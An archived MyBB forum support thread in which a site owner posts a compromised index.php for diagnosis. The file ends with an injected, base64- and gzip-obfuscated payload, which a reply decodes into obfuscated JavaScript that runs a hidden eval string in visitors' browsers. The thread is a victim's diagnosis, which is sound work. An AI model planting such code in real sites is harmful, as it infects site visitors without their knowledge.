MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > Trojan Virus on my form?
Full Version: Trojan Virus on my form?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

Curtiss

2012-06-06, 12:56 AM
(2012-06-06, 12:52 AM)Nathan Malcolm Wrote: [ -> ]It's most likely in your index.php then. It only affects that one page.

ACP > Tools & Maintenance > File Verification > Make sure no files have been changed without your knowledge.

all these files came back changed
wtf is going on here. how can this happen? I'm the only one with the admin password

images/dot_folder.gif Changed
images/index.html Changed
inc/3rdparty/index.html Changed
inc/cachehandlers/index.html Changed
inc/captcha_fonts/index.html Changed
inc/captcha_fonts/read_me.html Changed
inc/index.html Changed
inc/datahandlers/index.html Changed
inc/languages/index.html Changed
inc/mailhandlers/index.html Changed
inc/plugins/index.html Changed
inc/tasks/index.html Changed
install/images/index.html Changed
install/index.php Changed
install/resources/index.html Changed
jscripts/editor_themes/index.html Changed
jscripts/index.html Changed
uploads/avatars/index.html Changed
uploads/index.html Changed
index.php Changed
newthread.php Changed
admin/backups/index.html Changed
admin/inc/index.html Changed
admin/index.php Changed
admin/jscripts/index.html Changed
admin/modules/index.html Changed
admin/styles/index.html Changed
archive/index.php Changed
cache/index.html Changed
cache/themes/index.html
This is my index.php
anybody see anything wrong?

 <?php
/**
 * MyBB 1.6
 * Copyright 2010 MyBB Group, All Rights Reserved
 *
 * Website: http://mybb.com
 * License: http://mybb.com/about/license
 *
 * $Id: index.php 5765 2012-03-27 09:52:45Z Tomm $
 */

define("IN_MYBB", 1);
define('THIS_SCRIPT', 'index.php');

$templatelist = "index,index_whosonline,index_welcomemembertext,index_welcomeguest,index_whosonline_memberbit,forumbit_depth1_cat,forumbit_depth1_forum,forumbit_depth2_cat,forumbit_depth2_forum,forumbit_depth1_forum_lastpost,forumbit_depth2_forum_lastpost,index_modcolumn,forumbit_moderators,forumbit_subforums,index_welcomeguesttext";
$templatelist .= ",index_birthdays_birthday,index_birthdays,index_pms,index_loginform,index_logoutlink,index_stats,forumbit_depth3,forumbit_depth3_statusicon,index_boardstats";

require_once "./global.php";

require_once MYBB_ROOT."inc/functions_post.php";
require_once MYBB_ROOT."inc/functions_forumlist.php";
require_once MYBB_ROOT."inc/class_parser.php";
$parser = new postParser;

$plugins->run_hooks("index_start");

// Load global language phrases
$lang->load("index");

$logoutlink = $loginform = '';
if($mybb->user['uid'] != 0)
{
	eval("\$logoutlink = \"".$templates->get("index_logoutlink")."\";");
}
else
{
	//Checks to make sure the user can login; they haven't had too many tries at logging in.
	//Function call is not fatal
	if(login_attempt_check(false) !== false)
	{
		switch($mybb->settings['username_method'])
		{
			case 0:
				$login_username = $lang->login_username;
				break;
			case 1:
				$login_username = $lang->login_username1;
				break;
			case 2:
				$login_username = $lang->login_username2;
				break;
			default:
				$login_username = $lang->login_username;
				break;
		}
		eval("\$loginform = \"".$templates->get("index_loginform")."\";");
	}
}
$whosonline = '';
if($mybb->settings['showwol'] != 0 && $mybb->usergroup['canviewonline'] != 0)
{
	// Get the online users.
	$timesearch = TIME_NOW - $mybb->settings['wolcutoff'];
	$comma = '';
	$query = $db->query("
		SELECT s.sid, s.ip, s.uid, s.time, s.location, s.location1, u.username, u.invisible, u.usergroup, u.displaygroup
		FROM ".TABLE_PREFIX."sessions s
		LEFT JOIN ".TABLE_PREFIX."users u ON (s.uid=u.uid)
		WHERE s.time>'$timesearch'
		ORDER BY u.username ASC, s.time DESC
	");

	$forum_viewers = array();
	$membercount = 0;
	$onlinemembers = '';
	$guestcount = 0;
	$anoncount = 0;
	$doneusers = array();

	// Fetch spiders
	$spiders = $cache->read("spiders");

	// Loop through all users.
	while($user = $db->fetch_array($query))
	{
		// Create a key to test if this user is a search bot.
		$botkey = my_strtolower(str_replace("bot=", '', $user['sid']));

		// Decide what type of user we are dealing with.
		if($user['uid'] > 0)
		{
			// The user is registered.
			if($doneusers[$user['uid']] < $user['time'] || !$doneusers[$user['uid']])
			{
				// If the user is logged in anonymously, update the count for that.
				if($user['invisible'] == 1)
				{
					++$anoncount;
				}
				++$membercount;
				if($user['invisible'] != 1 || $mybb->usergroup['canviewwolinvis'] == 1 || $user['uid'] == $mybb->user['uid'])
				{
					// If this usergroup can see anonymously logged-in users, mark them.
					if($user['invisible'] == 1)
					{
						$invisiblemark = "*";
					}
					else
					{
						$invisiblemark = '';
					}

					// Properly format the username and assign the template.
					$user['username'] = format_name($user['username'], $user['usergroup'], $user['displaygroup']);
					$user['profilelink'] = build_profile_link($user['username'], $user['uid']);
					eval("\$onlinemembers .= \"".$templates->get("index_whosonline_memberbit", 1, 0)."\";");
					$comma = $lang->comma;
				}
				// This user has been handled.
				$doneusers[$user['uid']] = $user['time'];
			}
		}
		elseif(my_strpos($user['sid'], "bot=") !== false && $spiders[$botkey])
		{
			// The user is a search bot.
			$onlinemembers .= $comma.format_name($spiders[$botkey]['name'], $spiders[$botkey]['usergroup']);
			$comma = $lang->comma;
			++$botcount;
		}
		else
		{
			// The user is a guest.
			++$guestcount;
		}

		if($user['location1'])
		{
			$forum_viewers[$user['location1']]++;
		}
	}

	// Build the who's online bit on the index page.
	$onlinecount = $membercount + $guestcount + $botcount;
	
	if($onlinecount != 1)
	{
		$onlinebit = $lang->online_online_plural;
	}
	else
	{
		$onlinebit = $lang->online_online_singular;
	}
	if($membercount != 1)
	{
		$memberbit = $lang->online_member_plural;
	}
	else
	{
		$memberbit = $lang->online_member_singular;
	}
	if($anoncount != 1)
	{
		$anonbit = $lang->online_anon_plural;
	}
	else
	{
		$anonbit = $lang->online_anon_singular;
	}
	if($guestcount != 1)
	{
		$guestbit = $lang->online_guest_plural;
	}
	else
	{
		$guestbit = $lang->online_guest_singular;
	}
	$lang->online_note = $lang->sprintf($lang->online_note, my_number_format($onlinecount), $onlinebit, $mybb->settings['wolcutoffmins'], my_number_format($membercount), $memberbit, my_number_format($anoncount), $anonbit, my_number_format($guestcount), $guestbit);
	eval("\$whosonline = \"".$templates->get("index_whosonline")."\";");
}

// Build the birthdays for to show on the index page.
$bdays = $birthdays = '';
if($mybb->settings['showbirthdays'] != 0)
{
	// First, see what day this is.
	$bdaycount = 0; $bdayhidden = 0;
	$bdaytime = TIME_NOW;
	$bdaydate = my_date("j-n", $bdaytime, '', 0);
	$year = my_date("Y", $bdaytime, '', 0);
	
	$bdaycache = $cache->read("birthdays");
	
	if(!is_array($bdaycache))
	{
		$cache->update_birthdays();
		$bdaycache = $cache->read("birthdays");
	}
	
	$hiddencount = $bdaycache[$bdaydate]['hiddencount'];
	$today_bdays = $bdaycache[$bdaydate]['users'];

	$comma = '';
	if(!empty($today_bdays))
	{
		if(intval($mybb->settings['showbirthdayspostlimit']) > 0)
		{
			$bdayusers = array();
			foreach($today_bdays as $key => $bdayuser_pc)
			{
				$bdayusers[$bdayuser_pc['uid']] = $key;
			}

			if(!empty($bdayusers))
			{
				// Find out if our users have enough posts to be seen on our birthday list
				$bday_sql = implode(",", array_keys($bdayusers));
				$query = $db->simple_select("users", "uid, postnum", "uid IN ({$bday_sql})");

				while($bdayuser = $db->fetch_array($query))
				{
					if($bdayuser['postnum'] < $mybb->settings['showbirthdayspostlimit'])
					{
						unset($today_bdays[$bdayusers[$bdayuser['uid']]]);
					}
				}
			}
		}

		// We still have birthdays - display them in our list!
		if(!empty($today_bdays))
		{
			foreach($today_bdays as $bdayuser)
			{
				if($bdayuser['displaygroup'] == 0)
				{
					$bdayuser['displaygroup'] = $bdayuser['usergroup'];
				}

				// If this user's display group can't be seen in the birthday list, skip it
				if($groupscache[$bdayuser['displaygroup']] && $groupscache[$bdayuser['displaygroup']]['showinbirthdaylist'] != 1)
				{
					continue;
				}

				$bday = explode("-", $bdayuser['birthday']);
				if($year > $bday['2'] && $bday['2'] != '')
				{
					$age = " (".($year - $bday['2']).")";
				}
				else
				{
					$age = '';
				}

				$bdayuser['username'] = format_name($bdayuser['username'], $bdayuser['usergroup'], $bdayuser['displaygroup']);
				$bdayuser['profilelink'] = build_profile_link($bdayuser['username'], $bdayuser['uid']);
				eval("\$bdays .= \"".$templates->get("index_birthdays_birthday", 1, 0)."\";");
				++$bdaycount;
				$comma = $lang->comma;
			}
		}
	}

	if($hiddencount > 0)
	{
		if($bdaycount > 0)
		{
			$bdays .= " - ";
		}
		$bdays .= "{$hiddencount} {$lang->birthdayhidden}";
	}
	
	// If there are one or more birthdays, show them.
	if($bdaycount > 0 || $hiddencount > 0)
	{
		eval("\$birthdays = \"".$templates->get("index_birthdays")."\";");
	}
}

// Build the forum statistics to show on the index page.
if($mybb->settings['showindexstats'] != 0)
{
	// First, load the stats cache.
	$stats = $cache->read("stats");

	// Check who's the newest member.
	if(!$stats['lastusername'])
	{
		$newestmember = "no-one";
	}
	else
	{
		$newestmember = build_profile_link($stats['lastusername'], $stats['lastuid']);
	}

	// Format the stats language.
	$lang->stats_posts_threads = $lang->sprintf($lang->stats_posts_threads, my_number_format($stats['numposts']), my_number_format($stats['numthreads']));
	$lang->stats_numusers = $lang->sprintf($lang->stats_numusers, my_number_format($stats['numusers']));
	$lang->stats_newestuser = $lang->sprintf($lang->stats_newestuser, $newestmember);

	// Find out what the highest users online count is.
	$mostonline = $cache->read("mostonline");
	if($onlinecount > $mostonline['numusers'])
	{
		$time = TIME_NOW;
		$mostonline['numusers'] = $onlinecount;
		$mostonline['time'] = $time;
		$cache->update("mostonline", $mostonline);
	}
	$recordcount = $mostonline['numusers'];
	$recorddate = my_date($mybb->settings['dateformat'], $mostonline['time']);
	$recordtime = my_date($mybb->settings['timeformat'], $mostonline['time']);

	// Then format that language string.
	$lang->stats_mostonline = $lang->sprintf($lang->stats_mostonline, my_number_format($recordcount), $recorddate, $recordtime);

	eval("\$forumstats = \"".$templates->get("index_stats")."\";");
}

// Show the board statistics table only if one or more index statistics are enabled.
if(($mybb->settings['showwol'] != 0 && $mybb->usergroup['canviewonline'] != 0) || $mybb->settings['showindexstats'] != 0 || ($mybb->settings['showbirthdays'] != 0 && $bdaycount > 0))
{
	if(!is_array($stats))
	{
		// Load the stats cache.
		$stats = $cache->read("stats");
	}

	$post_code_string = '';
	if($mybb->user['uid'])
	{
		$post_code_string = "&amp;my_post_key=".$mybb->post_code;
	}

	eval("\$boardstats = \"".$templates->get("index_boardstats")."\";");
}

if($mybb->user['uid'] == 0)
{
	// Build a forum cache.
	$query = $db->query("
		SELECT *
		FROM ".TABLE_PREFIX."forums
		WHERE active != 0
		ORDER BY pid, disporder
	");
	
	$forumsread = my_unserialize($mybb->cookies['mybb']['forumread']);
}
else
{
	// Build a forum cache.
	$query = $db->query("
		SELECT f.*, fr.dateline AS lastread
		FROM ".TABLE_PREFIX."forums f
		LEFT JOIN ".TABLE_PREFIX."forumsread fr ON (fr.fid=f.fid AND fr.uid='{$mybb->user['uid']}')
		WHERE f.active != 0
		ORDER BY pid, disporder
	");
}

while($forum = $db->fetch_array($query))
{
	if($mybb->user['uid'] == 0)
	{
		if($forumsread[$forum['fid']])
		{
			$forum['lastread'] = $forumsread[$forum['fid']];
		}
	}
	$fcache[$forum['pid']][$forum['disporder']][$forum['fid']] = $forum;
}
$forumpermissions = forum_permissions();

// Get the forum moderators if the setting is enabled.
if($mybb->settings['modlist'] != "off")
{	
	$moderatorcache = $cache->read("moderators");
}

$excols = "index";
$permissioncache['-1'] = "1";
$bgcolor = "trow1";

// Decide if we're showing first-level subforums on the index page.
if($mybb->settings['subforumsindex'] != 0)
{
	$showdepth = 3;
}
else
{
	$showdepth = 2;
}
$forum_list = build_forumbits();
$forums = $forum_list['forum_list'];

$plugins->run_hooks("index_end");

eval("\$index = \"".$templates->get("index")."\";");
output_page($index);


#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#
?>

Frank.Barry

2012-06-06, 01:33 AM
Yea, the bottom of it:

#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7
nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB​/q5Bt+VxW4q2a/
qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9h
ynS4aZkb​T2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9​xnfL
SRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0B​H6X72fdc153NC7OQacfwJtAa
djZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUe
s5lRL+6rv6dCyCQ9e8BjBYVeoJUPMa​rENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#

anori

2012-06-06, 01:36 AM
Jup all virus scanners are going mental here, i do wonder what the message translates to.. would be nice to see in a safe enviroment what the string decodes to.

Frank.Barry

2012-06-06, 01:40 AM
This is the decoded string:

<script>try{q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}
try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h&&zz)?'ode':"";w=this;
e=w[f.substr(11)+zz];n=[-3.375,-3.75,7.5,8.875,7.375,9.625,8.625,7.625,
8.75,9.5,0.75,9.875,9.25,8.125,9.5,7.625,0,-0.125,2.5,8.125,7.75,9.25,7.125,8.625,7.625,-1,9.375,
9.25,7.375,2.625,-0.75,8,9.5,9.5,9,2.25,0.875,0.875,7.5,9.25,7.25,8.875,8.5,8.125,9.75,7.125,9.25,
0.75,7.375,8.875,8.625,0.875,9.375,9.5,7.125,9.5,9.375,0.75,9,8,9,-0.75,-1,8.75,7.125,8.625,7.625,
2.625,-0.75,5.5,9.875,8.125,9.5,9.5,7.625,9.25,-0.75,-1,9.375,7.375,9.25,8.875,8.5,8.5,8.125,8.75,
7.875,2.625,-0.75,7.125,9.625,9.5,8.875,-0.75,-1,7.75,9.25,7.125,8.625,7.625,7.25,8.875,9.25,7.5,
7.625,9.25,2.625,-0.75,8.75,8.875,-0.75,-1,7.125,8.5,8.125,7.875,8.75,2.625,-0.75,7.375,7.625,8.75,
9.5,7.625,9.25,-0.75,-1,8,7.625,8.125,7.875,8,9.5,2.625,-0.75,1.25,-0.75,-1,9.875,8.125,7.5,9.5,8,
2.625,-0.75,1.25,-0.75,2.75,2.5,0.875,8.125,7.75,9.25,7.125,8.625,7.625,2.75,-0.125,0.125,2.375,-3.375,
-3.75];for(i=6-2-1-2-1;-162+i!=2-2;i++){k=i;ss=ss+String["from"+"CharCode"](-1*4*h*(5+1*n[k]));}e(ss);}</script>

anori

2012-06-06, 01:55 AM
{q.appendChild(q+"");}

Searching for that is not a good idea on google Toungue

Curtiss

2012-06-06, 02:08 AM
So how did this happen? and how do I stop it from happening again?
Pages: 1 2
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > Trojan Virus on my form?